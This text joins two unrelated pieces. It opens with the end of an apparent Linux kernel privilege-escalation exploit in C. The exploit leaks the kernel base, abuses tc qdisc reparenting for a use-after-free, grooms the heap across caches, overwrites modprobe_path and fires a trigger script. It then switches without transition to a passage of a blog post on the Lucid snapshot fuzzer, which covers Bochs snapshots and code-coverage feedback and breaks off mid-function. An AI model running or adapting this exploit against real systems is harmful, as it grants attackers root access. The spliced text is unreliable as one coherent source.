    system("cp /usr/sbin/tc.bin /tmp/tc.bin >/dev/null 2>&1");
    system("cp /usr/sbin/ip.bin /tmp/ip.bin >/dev/null 2>&1");
    system("cp /usr/sbin/socat.bin /tmp/socat.bin >/dev/null 2>&1");
    system("cp /usr/sbin/iptables.bin /tmp/iptables.bin >/dev/null 2>&1");

    for (size_t i = 0; i < num_files; i++) {
        if (access(required_files[i], F_OK) != 0) {
            printf("%s did not exist, exiting...\n", required_files[i]);
            exit(-1);
        }
    }

    // Determine scan start and scan end
    uint64_t scan_start = KERNEL_LOWER_BOUND + g_entry_syscall_off;
    uint64_t scan_end = KERNEL_UPPER_BOUND + g_entry_syscall_off;

    // Attempt to entry bleed the kernel base
    g_kernel_base = leak_syscall_entry(scan_start, scan_end) - g_entry_syscall_off;
    printf("[>] Kernel base address: 0x%lx\n", g_kernel_base);

    // Update kernfs addr
    g_kernfs_addr += g_kernel_base;
    printf("[>] Kernfs buffer address: 0x%lx\n", g_kernfs_addr);

    // Update arb write gadget
    g_write_gadget_addr += g_kernel_base;
    printf("[>] Arbitrary write gadget address: 0x%lx\n", g_write_gadget_addr);

    // Update modprobe
    g_modprobe_addr += g_kernel_base;
    printf("[>] Modprobe path address: 0x%lx\n", g_modprobe_addr);

    // Initialize the write target, we have to add 1 because /sbin/modprobe
    // already contains a '/' leading character that we'll retain
    g_write_target = (g_modprobe_addr - WRITE_TARGET_OFFSET) + 1;

    // Update NULL gadget
    g_null_gadget_addr += g_kernel_base;
    printf("[>] Return NULL gadget address: 0x%lx\n", g_null_gadget_addr);

    // Get CAPs
    printf("[>] Doing the unshare...\n");
    unshare_stuff();

    // Pin our process
    printf("[>] Pinning our process to core-0...\n");
    pin_to_core_0();

    // Setup listener
    printf("[>] Starting UDP listener...\n");
    start_udp_listener();

    // Allocate pipes
    printf("[>] Creating pipes...\n");
    allocate_pipes();

    // Allocate classes 1:1 and 1:3 and give them qdiscs
    printf("[>] Setting up initial classes...\n");
    setup_classes();

    // Execute cross-cache stage 1
    printf("[>] Executing cross-cache stage-1...\n");
    cc_1();

    // Execute cross-cache stage 2
    printf("[>] Executing cross-cache stage-2...\n");
    cc_2();

    // Allocate the victim class
    printf("[>] Allocating victim class 1:2...\n");
    system("./tc.bin class add dev lo classid 1:2 drr");

    // Execute the bug to re-parent 1:3's qdisc to 1:2
    printf("[>] Executing bug to reparent qdisc to 1:2 from 1:3...\n");
    system("./tc.bin qdisc replace dev lo parent 1:2 handle 3:0");

    // Display the setup
    printf("[>] Displaying hierarchy setup...\n");
    system("./tc.bin class ls dev lo");
    system("./tc.bin qdisc ls");

    // Enqueue packets in 1:1 and 1:2 qdiscs
    printf("[>] Enqueueing packets in 1:1 and 1:2...\n");
    system("echo \"\" | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))");
    system("echo \"\" | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))");

    // Delete classes 1:1 and 1:2 
    printf("[>] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...\n");
    system("./tc.bin class delete dev lo classid 1:1");
    system("./tc.bin class delete dev lo classid 1:2");
    cc_3();

    // Execute cross-cache stage 4
    printf("[>] Executing cross-cache stage-4...\n");
    cc_4();

    // Execute cross-cache stage 5 and reclaim page with pipe writes
    printf("[>] Executing cross-cache stage-5 and reclaiming page...\n");
    cc_5();
    reclaim_page();

    // Overwrite modprobe path
    printf("[>] Overwriting modprobe path...\n");
    overwrite_modprobe();
    printf("[>] Modprobe path is *probably* overwritten lol!\n");

    // Execute trigger
    system("./trigger.sh");
    exit(-1);
}

Fuzzer Development 4: Snapshots, Code-Coverage, and Fuzzing

2024-06-23T00:00:00+00:00

Background

This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository.

Introduction

Previously, we left off with implementing enough of the Linux emulation logic to get Lucid running a -static-pie Bochs up to its start menu. Well, we’ve accomplished a lot in the intervening few months since then. We’ve now implemented snapshots, code-coverage feedback, and more Linux emulation logic to the point now that we can actually fuzz things! So in this post, we’ll review some of the major features that have been added to the codebase as well as some examples on how to set the fuzzer up for fuzzing.

Snapshots

One of the key benefits to the design of this fuzzer (thank you Brandon Falk) is that the entire state of the emulated/target system is completely encapsulated by Bochs. The appeal here is that if we can reliably record and reset Bochs’ state, we get target snapshots by default. In the future, this will benefit us when our targets affect device states, something like fuzzing a network service. So now our problem becomes, how do we, on Linux, perfectly record and reset the state of a process?

Well, the solution I came up with I think is very aesthetically pleasing. We need to reset the following state in Bochs:

Any writable PT_LOAD memory segments in the Bochs image itself
Bochs’ file-table
Bochs’ dynamic memory, such as heap allocations
Bochs’ extended CPU state: AVX registers, floating point unit, etc
Bochs’ registers

Right off the bat, dynamic memory should be pretty trivial to record since we handle all calls to mmap ourselves in our fuzzer in the syscall emulation code. So we can pretty easily snapshot MMU state that way. This also applies to the file-table, since we also control all file I/O the same way. For now though, I haven’t implemented file-table snapshotting because for my fuzzing harness I’m using for development, Bochs doesn’t touch any files. I’ve resorted to marking files as dirty if we are fuzzing and they are touched and just panicking at that point for now. Later, we should be able to approach file snapshotting the same way we do the MMU.

Extended CPU state can be saved and restored with dedicated machine instructions, such as xsave/xrstor (or fxsave/fxrstor on CPUs without XSAVE support).

But an outstanding question for me was figuring out how to record and reset the PT_LOAD segments. We can’t really track the dirtying of these pages well in Linux userland because the writes happen natively. There are some common approaches to this type of problem in the fuzzing space though if you want to restore these pages differentially:

Mark those pages as non-writable and handle write-access faults for each page. This approach will let you know if Bochs ever uses the writable page. Once you handle a fault, you can permanently mark the page as writable and then lazily reset it each fuzzing iteration.
Use some of the utilities exposed for things like the Checkpoint Restore effort in /proc as discussed by d0c s4vage.

Ultimately though, I decided that for simplicity’s sake, I’d just reset all the writable segments each time.

The real problem however, is that Bochs’ dynamic memory allocations can be humongous because it will allocate heap memory to hold the emulated guest memory (your target system). So if you configure a guest VM with 2GB of RAM, Bochs will attempt to make a heap allocation of 2GB. This makes capturing and restoring the snapshot very expensive, as a 2GB memcpy each fuzzing iteration would be very costly. So I needed a way to avoid this. Bochs does have memory access hooks however, so I could track dirtied memory in the guest this way. This might be a future implementation if we find that our current implementation becomes a performance bottleneck.

In line with my project philosophy for Lucid at the moment, which is that we’re ok sacrificing performance for either introspection or architectural/implementation simplicity, I decided that there was a nice solution we could leverage given that we are the ones mapping Bochs into memory and not the kernel. As long as the ELF image’s loadable segments are ordered such that the writable segments are loaded last, the first writable segment marks the start of a block of memory that needs resetting. At this point you can think of the mapping like this in memory:

|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   <-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|

This is nice for us because what we actually have now is the start of a contiguous block of writable memory that we need to restore each fuzzing iteration. The rest of the mutable memory that Bochs will affect that we care about for snapshots can be arbitrarily mapped, let’s think about it:

Extended state save area for Bochs: Yep, we control where this is mapped, we can map this right up against the last writable ELF segment with mmap and MAP_FIXED. Now our contiguous block contains the extended state as well.
MMU Dynamic Memory (Brk, Mmap): Yep, we control this because we pre-allocate dynamic memory and then use these syscalls as basically bump allocator APIs so this is also now part of our contiguous block.

So now, we can conceptualize the entire block of memory that we need to track for snapshots as:

|-------------------------------------------------------|
|            Non-Writable ELF Segments                  |
|-------------------------------------------------------|   <-- Start of memory that we need to record and restore
|              Writable ELF Segments                    |
|-------------------------------------------------------|
|             Bochs Extended CPU State                  |
|-------------------------------------------------------|
|                Bochs MMU/Brk Pool                     |
|-------------------------------------------------------|   <-- End of memory that we need to record and restore
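The MMU/Brk pool at the bottom of that layout behaves like a bump allocator over pre-allocated memory. A minimal C sketch of the idea follows; the struct and function names and the 4096-byte granularity are assumptions for the example, not Lucid's actual Mmu code.

```c
#include <stddef.h>
#include <stdint.h>

#define POOL_PAGE 4096UL   // allocation granularity assumed for the sketch

// A pre-allocated pool that only ever grows by bumping an offset
typedef struct {
    uintptr_t base;   // start of the pre-allocated pool
    size_t size;      // total bytes in the pool
    size_t used;      // bytes handed out so far
} bump_pool_t;

// Serve an mmap/brk-style request by bumping the offset.
// Returns the address of the new chunk, or 0 if the pool is exhausted.
uintptr_t bump_alloc(bump_pool_t *pool, size_t len) {
    // Round the request up to a whole number of pages
    size_t rounded = (len + POOL_PAGE - 1) & ~(POOL_PAGE - 1);
    if (rounded < len || rounded > pool->size - pool->used)
        return 0;

    uintptr_t addr = pool->base + pool->used;
    pool->used += rounded;
    return addr;
}

// Snapshot restore for the allocator itself: put the bump offset back to
// what it was when the snapshot was taken
void bump_reset(bump_pool_t *pool, size_t snapshot_used) {
    pool->used = snapshot_used;
}
```

Because allocation is just an offset into one region, the allocator's own state is a handful of integers, and the memory it hands out is already inside the contiguous block that gets restored.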

So why do we care about the writable memory being compact and contiguous like this? We still face the issue where the MMU/Brk pool of memory is way too large to do a giant memcpy each fuzzing iteration. Our solution must either use differential resets (ie, only reset what was dirty) or it must find a new way to do wholesale restoration since memcpy is not good enough.

Without wanting to noodle over differential resets and trying to focus on simplicity, I settled on an efficient way to use the concept of contiguous memory to our advantage for resetting the entire block without relying on memcpy. We can cache the snapshot contents in memory for the duration of the fuzzer by using Linux’s shared memory objects which are allocated with libc::shm_open. This is basically like opening a file that is backed by shared memory, so we won’t really trigger any disk reads or expensive file I/O when we read the contents for each snapshot restoration.

Next, when it’s time to restore, we can simply mmap that “file” overtop of the dirty contiguous block. They will have the same size, right? And we control the location of the contiguous memory block, so this makes resetting dirty memory extremely easy! It’s literally mostly just this code:

// This function will take the saved data in the shm object and just mmap it
// overtop of the writable memory block to restore the memory contents
#[inline]
fn restore_memory_block(base: usize, length: usize, fd: i32) ->
    Result<(), LucidErr> {
    // mmap the saved memory contents overtop of the dirty contents
    let result = unsafe {
        libc::mmap(
            base as *mut libc::c_void,
            length,
            libc::PROT_READ | libc::PROT_WRITE,
            libc::MAP_PRIVATE | libc::MAP_FIXED,
            fd,
            0
        )
    };

    if result == libc::MAP_FAILED || result != base as *mut libc::c_void { 
        return Err(LucidErr::from("Failed to mmap restore snapshot"));
    }

    Ok(())
}

You just need the file descriptor for the shared memory object and you can perform the restoration for the memory contents. On my relatively old CPU and inside a VMware VM, I was able to reset this memory block roughly 18k times per second, which is definitely fast enough for a fuzzer like Lucid that will most certainly bottleneck on target emulation code. That’s not to say that we won’t have issues in the future however. A lot of kernel time with this approach is spent destroying the pages we mmap overtop of if they are no longer needed, and this may be a bottleneck if we scale our fuzzing up in the future. Time will tell. For now, I love how simple and easy the approach is. Shoutout to Dominik Maier and the rest of the fuzzing discord for helping me workshop the idea.

The second most important benefit, behind the simplicity, is that the performance is relatively constant regardless of block size. We get to take advantage of several efficient memory management optimizations in the Linux kernel and we don’t have an issue with 2GB memcpy operations slowing us down. With my current setup of having 64MB of guest memory allocated, this shmem + mmap approach was roughly 10x faster than a giant memcpy: we spend about 13% of CPU time in the snapshot restoration code with this approach, versus 96% with memcpy. So it works well for us right now.

Some other small things about snapshot restoration, we can “clone” an existing MMU, ie the one we saved during snapshot recording, to the current MMU (dirty) with something like this very trivially:

// Copy the contents of an existing MMU, used for snapshot restore
    pub fn restore(&mut self, mmu: &Mmu) {
        self.map_base = mmu.map_base;
        self.map_length = mmu.map_length;
        self.brk_base = mmu.brk_base;
        self.brk_size = mmu.brk_size;
        self.curr_brk = mmu.curr_brk;
        self.mmap_base = mmu.mmap_base;
        self.mmap_size = mmu.mmap_size;
        self.curr_mmap = mmu.curr_mmap;
        self.next_mmap = mmu.next_mmap;
    }

We also have the GPRs of Bochs to worry about, but luckily for us, those are saved already when Bochs context switches into Lucid in order to take the snapshot.

Triggering Snapshot Operations

The next thing we need to do is determine how to invoke snapshot logic from the harness running in the guest. I decided to piggyback off of Bochs’ approach and leverage specific types of NOP instruction sequences that are unlikely to exist in your target (collisions are not likely). Bochs uses these types of NOPs as magic breakpoints for when you’re using Bochs compiled in debugger mode. They are as follows:

87C9  | xchg cx,cx  | 1000011111 001 001 -> 1
87D2  | xchg dx,dx  | 1000011111 010 010 -> 2
87DB  | xchg bx,bx  | 1000011111 011 011 -> 3
87E4  | xchg sp,sp  | 1000011111 100 100 -> 4
87ED  | xchg bp,bp  | 1000011111 101 101 -> 5
87F6  | xchg si,si  | 1000011111 110 110 -> 6
87FF  | xchg di,di  | 1000011111 111 111 -> 7

This code is located in bochs/cpu/data_xfer16.cc. The bxInstruction_c struct has fields for this type of operation which track both the src register and the dst register. If they are the same, it checks them against their binary representation in the instruction encoding. For example xchg dx, dx would mean that i->src() and i->dst() both equal 2.
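To see where those register numbers come from, here is a small C sketch that decodes the two bytes from the table above. The function name is hypothetical and this is not Bochs code. It only checks that the ModRM byte is register-direct and that both 3-bit register fields match.

```c
#include <stdint.h>

// Decode `87 /r` with a register-direct ModRM byte. Returns the register
// number (1 through 7, as in the table) when source and destination are
// the same register, or -1 for anything else.
int magic_xchg_reg(uint8_t opcode, uint8_t modrm) {
    // 0x87 is the xchg r/m, r opcode
    if (opcode != 0x87)
        return -1;

    // Top two bits of ModRM must be 11 for a register-to-register form
    if ((modrm >> 6) != 0x3)
        return -1;

    int reg = (modrm >> 3) & 0x7;   // middle three bits
    int rm = modrm & 0x7;           // low three bits

    // Both operands must be the same register; register 0 (ax) is not in
    // the table, so it is rejected here as well
    if (reg != rm || reg == 0)
        return -1;

    return reg;
}
```

For example, 0xD2 is 11 010 010 in binary, so both fields are 2, which is the xchg dx, dx row.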

So in this instruction handler, we already have an example of how to implement logic to get Bochs to recognize instructions in the guest and do something.

We also have two types of snapshots really. One is when we use a regular “vanilla” version of Bochs with a GUI and what we’re aiming to do is “snapshot” the Bochs state to disk where we want to start fuzzing from. This is distinct from the snapshot that the fuzzer conceives of. So for instance, if you’ve built a harness like I have, you would want to boot up your system with Bochs in the GUI, get a shell, and finally run your harness. Your harness can then trigger one of these magic breakpoints to get Bochs to then save its state to disk, and this is what I’ve done.

Bochs has the ability to save its state to disk in the event that a user uses the “Suspend” feature, like pausing a VM. Bochs can then resume that suspended VM later in the future, great feature obviously. We can take advantage by just copy-pasta-ing that code right over to the instruction handler from where it normally lives (somewhere in the GUI simulation interface code). I think all I had to do was add an additional include to data_xfer16.cc and then hack in my logic as follows:

#if BX_SNAPSHOT
  // Check for take snapshot instruction `xchg dx, dx`
  if ((i->src() == i->dst()) && (i->src() == 2)) {
    BX_COMMIT_INSTRUCTION(i);
    if (BX_CPU_THIS_PTR async_event)
      return;
    ++i;
    char save_dir[] = "/tmp/lucid_snapshot";
    mkdir(save_dir, 0777);
    printf("Saving Lucid snapshot to '%s'...\n", save_dir);
    if (SIM->save_state(save_dir)) {
      printf("Successfully saved snapshot\n");
      sleep(2);
      exit(0);
    }
    else {
      printf("Failed to save snapshot\n");
    }
    BX_EXECUTE_INSTRUCTION(i);
  }
#endif

So if we build a vanilla Bochs with a GUI and define BX_SNAPSHOT during the build process, we should be able to make Bochs save its state to disk when it encounters a xchg dx, dx instruction as if the end-user has pressed suspend at the perfect moment down to the instruction in our harness.
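On the guest side, the harness only needs to execute that one instruction at the point where fuzzing should start. A minimal sketch in C with GCC-style inline assembly might look like the following; the function names and the toy target are made up for the example, and the real harness may be structured differently.

```c
#include <stddef.h>
#include <stdint.h>

// Emit the `xchg dx, dx` marker. On real hardware this is effectively a
// NOP; only a Bochs build that checks for it gives it meaning.
static inline void lucid_snapshot_marker(void) {
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile ("xchg %%dx, %%dx" ::: "memory");
#endif
}

// Hypothetical stand-in for the code under test
static uint32_t target_parse(const uint8_t *input, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i++)
        sum += input[i];
    return sum;
}

// Do all expensive setup before the marker so the saved state starts right
// at the interesting code
uint32_t harness_run(const uint8_t *input, size_t len) {
    lucid_snapshot_marker();
    return target_parse(input, len);
}
```

The "memory" clobber keeps the compiler from moving loads and stores across the marker, so the saved state reflects everything the harness set up before it.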

Now in the fuzzer, we will tell our Bochs to resume the saved-to-disk state and right as it’s about to emulate its first instruction in the CPU-loop, break back into the fuzzer and take the sort of snapshot the fuzzer is going to use that we discussed in the previous section. This was done by hacking in some code in cpu/cpu.cc as follows:

jmp_buf BX_CPU_C::jmp_buf_env;

void BX_CPU_C::cpu_loop(void)
{
#if BX_SUPPORT_HANDLERS_CHAINING_SPEEDUPS
  volatile Bit8u stack_anchor = 0;

  BX_CPU_THIS_PTR cpuloop_stack_anchor = &stack_anchor;
#endif

#if BX_DEBUGGER
  BX_CPU_THIS_PTR break_point = 0;
  BX_CPU_THIS_PTR magic_break = 0;
  BX_CPU_THIS_PTR stop_reason = STOP_NO_REASON;
#endif

// Place the Lucid snapshot taking code here above potential long jump returns
#if BX_LUCID
  lucid_take_snapshot();
#endif

  if (setjmp(BX_CPU_THIS_PTR jmp_buf_env)) {
    // can get here only from exception function or VMEXIT
    BX_CPU_THIS_PTR icount++;
    BX_SYNC_TIME_IF_SINGLE_PROCESSOR(0);
#if BX_DEBUGGER || BX_GDBSTUB
    if (dbg_instruction_epilog()) return;
#endif
#if BX_GDBSTUB
    if (bx_dbg.gdbstub_enabled) return;
#endif
  }

You can see that if we have built Bochs for the fuzzer (with BX_LUCID defined), we’ll call the take snapshot function before we start emulating instructions or even return from an exception via longjmp or similar logic. The logic of the take snapshot code is very simple, we just set some variables in the global execution context to let Lucid know why we exited the VM and what it should do about it:

// Call into Lucid to take snapshot of current Bochs state
__attribute__((optimize(0))) void lucid_take_snapshot(void) {
    if (!g_lucid_ctx)
        return;

    // Set execution mode to Bochs
    g_lucid_ctx->mode = BOCHS;

    // Set the exit reason
    g_lucid_ctx->exit_reason = TAKE_SNAPSHOT;

    // Inline assembly to switch context back to fuzzer
    __asm__ (
        "push %%r15\n\t"          // Save r15 register
        "mov %0, %%r15\n\t"       // Move context pointer into r15
        "call *(%%r15)\n\t"       // Call context_switch
        "pop %%r15"               // Restore r15 register
        :                         // No output
        : "r" (g_lucid_ctx)       // Input
        : "memory"                // Clobber
    );

    return;
}

Now Lucid can save this state as a snapshot and reset to it after each fuzzing iteration, all by virtue of just including a simple xchg dx, dx instruction in your fuzzing harness, very cool stuff imo! At the end of a fuzzcase, when we’ve reset the snapshot state and we want to start executing Bochs again from the snapshot state, we just call this function via a context switch which ends with a simple ret instruction. This will behave as if Bochs is just returning from calling lucid_take_snapshot as a normal function:

// Restore Bochs' state from the snapshot
fn restore_bochs_execution(contextp: *mut LucidContext) {
    // Set the mode to Bochs
    let context = LucidContext::from_ptr_mut(contextp);
    context.mode = ExecMode::Bochs;

    // Get the pointer to the snapshot regs
    let snap_regsp = context.snapshot_regs_ptr();

    // Restore the extended state
    context.restore_xstate();

    // Move that pointer into R14 and restore our GPRs
    unsafe {
        asm!(
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",             // Recover saved CPU flags 
            "popfq",
            "ret",
            in(reg) snap_regsp,
        );
    }
}

That’s pretty much it for snapshots I think, curious to see how they’ll perform in the future, but they’re doing the trick now.

Code Coverage Feedback

After snapshots were settled, I moved on to implementing code coverage feedback. At first I was kind of paralyzed by the options since we have access to everything via Bochs. We know every single PC that is executed during a fuzzing iteration so really we can do whatever we want. I ended up implementing something pretty close to what old-school AFL did which tracks code coverage at two levels:

Edge pairs: These are addresses where a branch takes place. For example if the instruction at 0x1337 is a jmp 0x13371337, then we would have an edge pair of 0x1337 and 0x13371337. This combination is what we’re keeping track of. Basically what is the current PC and what PC are we branching to. This also applies when we don’t take a branch, because we skip over the branching instruction and land on a new instruction instead which in its own way is a branch.
Edge pair frequency: We also want to know how often these edge-pairs are accessed during a fuzzing iteration. So not only binary fidelity of “edge pair seen/edge pair not seen”, we also want frequency. We want to differentiate inputs that hit the edge pair 100x vs one that hits it 100000x during a fuzzing iteration. This added fidelity should provide us more valuable feedback vs. just rough data of edges hit vs not hit.
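As a rough illustration of those two levels, here is a small C sketch of an edge map with hit-count bucketing. Everything in it is an assumption made for the example rather than Lucid's implementation: the hash, the map size, the power-of-two buckets (loosely in the spirit of AFL's hit-count classes), and all of the names.

```c
#include <stddef.h>
#include <stdint.h>

#define SKETCH_MAP_SIZE 65536

typedef struct {
    uint32_t curr[SKETCH_MAP_SIZE];  // hit counts for the current iteration
    uint8_t best[SKETCH_MAP_SIZE];   // highest bucket ever seen per slot
} edge_cov_t;

// Mix (src, dst) into a map index. Order matters, so A->B and B->A are
// hashed differently. Distinct edges can still collide in the same slot.
static size_t edge_index(uint64_t src, uint64_t dst) {
    uint64_t h = src * 0x9E3779B97F4A7C15ULL;
    h ^= dst;
    h *= 0x9E3779B97F4A7C15ULL;
    h ^= h >> 32;
    return (size_t)(h % SKETCH_MAP_SIZE);
}

// Called for every branch, taken or not taken
void edge_record(edge_cov_t *cov, uint64_t src, uint64_t dst) {
    uint32_t *slot = &cov->curr[edge_index(src, dst)];
    if (*slot != UINT32_MAX)
        (*slot)++;
}

// Collapse a raw hit count into a power-of-two bucket:
// 0 -> 0, 1 -> 1, 2-3 -> 2, 4-7 -> 3, and so on
static uint8_t hit_bucket(uint32_t hits) {
    uint8_t bucket = 0;
    while (hits) {
        bucket++;
        hits >>= 1;
    }
    return bucket;
}

// End of a fuzzing iteration: count slots whose bucket improved, remember
// the new best, and clear the per-iteration counts. A non-zero return
// means the input produced new coverage.
size_t edge_finish_iteration(edge_cov_t *cov) {
    size_t improved = 0;
    for (size_t i = 0; i < SKETCH_MAP_SIZE; i++) {
        uint8_t bucket = hit_bucket(cov->curr[i]);
        if (bucket > cov->best[i]) {
            cov->best[i] = bucket;
            improved++;
        }
        cov->curr[i] = 0;
    }
    return improved;
}
```

With this bucketing, an input that hits an edge 100 times and one that hits it 100000 times land in different buckets, while 100 versus 101 hits do not count as new coverage.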

With these two levels of introspection in mind, we had to choose a way to implement this. Luckily, Bochs can be compiled with instrumentation, and it exposes stubs for this in instrument/stubs/instrument.cc. Some of the stubs are particularly useful for us because they instrument branching instructions. So if you compile Bochs with BX_INSTRUMENTATION defined, you get those stubs compiled into the instruction handlers that handle branching instructions in the guest. They have a prototype that logs the current PC and the destination PC. I had to make some changes to the stub signature for the conditional branch not taken instrumentation because it did not track which PC execution falls through to, and we need that information to form our edge-pair. Here is what the stub signatures looked like before I modified them:

void bx_instr_cnear_branch_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {}
void bx_instr_cnear_branch_not_taken(unsigned cpu, bx_address branch_eip) {}

And I changed them to:

void bx_instr_cnear_branch_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {}
void bx_instr_cnear_branch_not_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {}

So I had to go through and change all the macro invocations in the instruction handlers to calculate a new taken PC for bx_instr_cnear_branch_not_taken, which was annoying but as far as hacking on someone else’s project goes, very easy. Here is an example from the Bochs patch file of what I changed at the call-site, you can see that I had to calculate a new variable bx_address taken in order to get a pair:

-  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP);
+  bx_address taken = PREV_RIP + i->ilen();
+  BX_INSTR_CNEAR_BRANCH_NOT_TAKEN(BX_CPU_ID, PREV_RIP, taken);

Now that we know the current PC and the PC we’re branching to in the target each time, it’s time to put that information to use. On the Lucid side in Rust, I have a coverage map implementation like this:

const COVERAGE_MAP_SIZE: usize = 65536;

#[derive(Clone)]
#[repr(C)]
pub struct CoverageMap {
    pub curr_map: Vec<u8>,          // The hit count map updated by Bochs
    history_map: Vec<u8>,           // The map from the previous run
    curr_map_addr: *const u8,       // Address of the curr_map used by Bochs
}

It’s a long array of u8 values where each index represents an edge-pair that we’ve hit. We pass the address of that array to Bochs so that it can set the value in the array for the edge-pair it’s currently tracking. So Bochs will encounter a branching instruction, it will have a current PC and a PC it’s branching to, it’ll formulate a meaningful value for it and translate that value into an index in the coverage map array of u8 values. At that index, it will increment the u8 value. This process is done by hashing the two edge addresses and then doing a bitwise AND operation so that we mask off the bits that wouldn’t be an index value in the coverage map (this only works because the map size is a power of two). This means we could have collisions: we may have an edge-pair that yields the same hash as a second distinct edge-pair. But this is just a drawback associated with this strategy that we’ll have to accept. There are other ways of having non-colliding edge-pair tracking but it would require hash-lookups each time we encounter a branching instruction. This may be expensive, but given that we have such a slow emulator running our target code, the relative overhead may not matter much, so we may eventually switch to this paradigm, we’ll see.
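To make the non-colliding alternative concrete, here is a minimal sketch of what exact edge-pair tracking could look like. This is not code from Lucid: `ExactEdgeMap`, `record`, and `edge_count` are hypothetical names, and the sketch assumes a plain `HashMap` keyed on the full (source PC, destination PC) pair.

```rust
use std::collections::HashMap;

/// Hypothetical collision-free tracker: one counter per exact (src, dst)
/// pair instead of one u8 slot per hash bucket.
#[derive(Default)]
pub struct ExactEdgeMap {
    hits: HashMap<(u64, u64), u32>,
}

impl ExactEdgeMap {
    /// Record one traversal of the edge src -> dst and return its new count.
    /// This is the per-branch hash lookup the text warns about.
    pub fn record(&mut self, src: u64, dst: u64) -> u32 {
        let count = self.hits.entry((src, dst)).or_insert(0);
        *count = count.saturating_add(1);
        *count
    }

    /// Number of distinct edges seen so far.
    pub fn edge_count(&self) -> usize {
        self.hits.len()
    }
}
```

The trade-off is the one described above: every branch pays for a hash-table lookup and possibly an allocation, in exchange for never confusing two distinct edges.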

For the hashing algorithm I chose to use dbj2_hash (a take on the well-known djb2 hash), which is a weird little hashing algorithm that is fast and supposedly offers some pretty good distribution (low collision rate). So all in all we do the following:

Encounter an edge-pair via an instrumented branching instruction
Hash the two edge addresses using dbj2_hash
Mask the hash value so that it is always a valid index, i.e. less than coverage_map.len()
Increase the u8 value at coverage_map[hash]

This is how we update the map from Bochs:

static inline uint32_t dbj2_hash(uint64_t src, uint64_t dst) {
    if (!g_lucid_ctx)
        return 0;

    uint32_t hash = 5381;
    hash = ((hash << 5) + hash) + (uint32_t)(src);
    hash = ((hash << 5) + hash) + (uint32_t)(dst);
    return hash & (g_lucid_ctx->coverage_map_size - 1);
}

static inline void update_coverage_map(uint64_t hash) {
    // Get the address of the coverage map
    if (!g_lucid_ctx)
        return;

    uint8_t *map_addr = g_lucid_ctx->coverage_map_addr;

    // Mark this as hit
    map_addr[hash]++;

    // If it's been rolled-over to zero, make it one
    if (map_addr[hash] == 0) {
        map_addr[hash] = 1;
    }
}

void bx_instr_cnear_branch_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {
    uint64_t hash = dbj2_hash(branch_eip, new_eip);
    update_coverage_map(hash);
    //printf("CNEAR TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);
}
void bx_instr_cnear_branch_not_taken(unsigned cpu, bx_address branch_eip, bx_address new_eip) {
    uint64_t hash = dbj2_hash(branch_eip, new_eip);
    update_coverage_map(hash);
    //printf("CNEAR NOT TAKEN: (0x%lx, 0x%lx) Hash: 0x%lx\n", branch_eip, new_eip, hash);
}
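For readers who want to poke at the hashing behavior outside of Bochs, here is a rough Rust port of the two helpers above. It is only a sketch: `edge_index` and `bump` are hypothetical names, and the map size is taken from the `COVERAGE_MAP_SIZE` constant shown earlier rather than from the shared context.

```rust
// Must be a power of two, otherwise `& (size - 1)` is not a valid modulo
const COVERAGE_MAP_SIZE: usize = 65536;

/// Port of the C hash: two rounds of `hash * 33 + value` starting from 5381,
/// then masked down to a valid index into the coverage map.
fn edge_index(src: u64, dst: u64) -> usize {
    let mut hash: u32 = 5381;
    hash = (hash << 5).wrapping_add(hash).wrapping_add(src as u32);
    hash = (hash << 5).wrapping_add(hash).wrapping_add(dst as u32);
    (hash as usize) & (COVERAGE_MAP_SIZE - 1)
}

/// Increment a hit count, skipping zero on rollover so that an edge we have
/// hit never looks like an edge we have not hit.
fn bump(map: &mut [u8], idx: usize) {
    map[idx] = map[idx].wrapping_add(1);
    if map[idx] == 0 {
        map[idx] = 1;
    }
}
```

Collisions are easy to construct with this hash. Because the first address is effectively multiplied by 33 before the second is added, the pairs (0x1000, 0x2021) and (0x1001, 0x2000) land on the same index: adding 1 to the source is cancelled out by subtracting 33 from the destination.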

Now we have this array of u8 values on the Lucid side to evaluate after each fuzzing iteration. On the Lucid side we need to do a few things:

We need to categorize each u8 into what’s called a bucket, which is just a range of hits for the edge-pair. For example, hitting the edge-pair 100 times is not much different from hitting the same edge-pair 101 times, so we logically bucket those two types of coverage data together. They are the same as far as we’re concerned. What we really want are drastic differences. So if we see an edge-pair 1 time vs 1000 times, we want to know that difference. I stole the bucketing logic straight from AFL++ which has empirically tested the best bucketing strategies to get the most valuable feedback for most targets.
After we transform the raw hit counts to bucket values instead, we’ll want to see if we see any new bucket counts that we haven’t seen before. This means we’ll need to keep a copy of the coverage map around at all times as well. We will walk both of them together. If the current coverage map now has a higher u8 value for an edge-pair than the old coverage map (historical one that tracks all time highs for each index), then we have new coverage results we’re interested in!

You can see that logic here:

    // Roughly sort ranges of hitcounts into buckets, based on AFL++ logic
    #[inline(always)]
    fn bucket(hitcount: u8) -> u8 {
        match hitcount {
            0 => 0,
            1 => 1,
            2 => 2,
            3 => 4,
            4..=7 => 8,
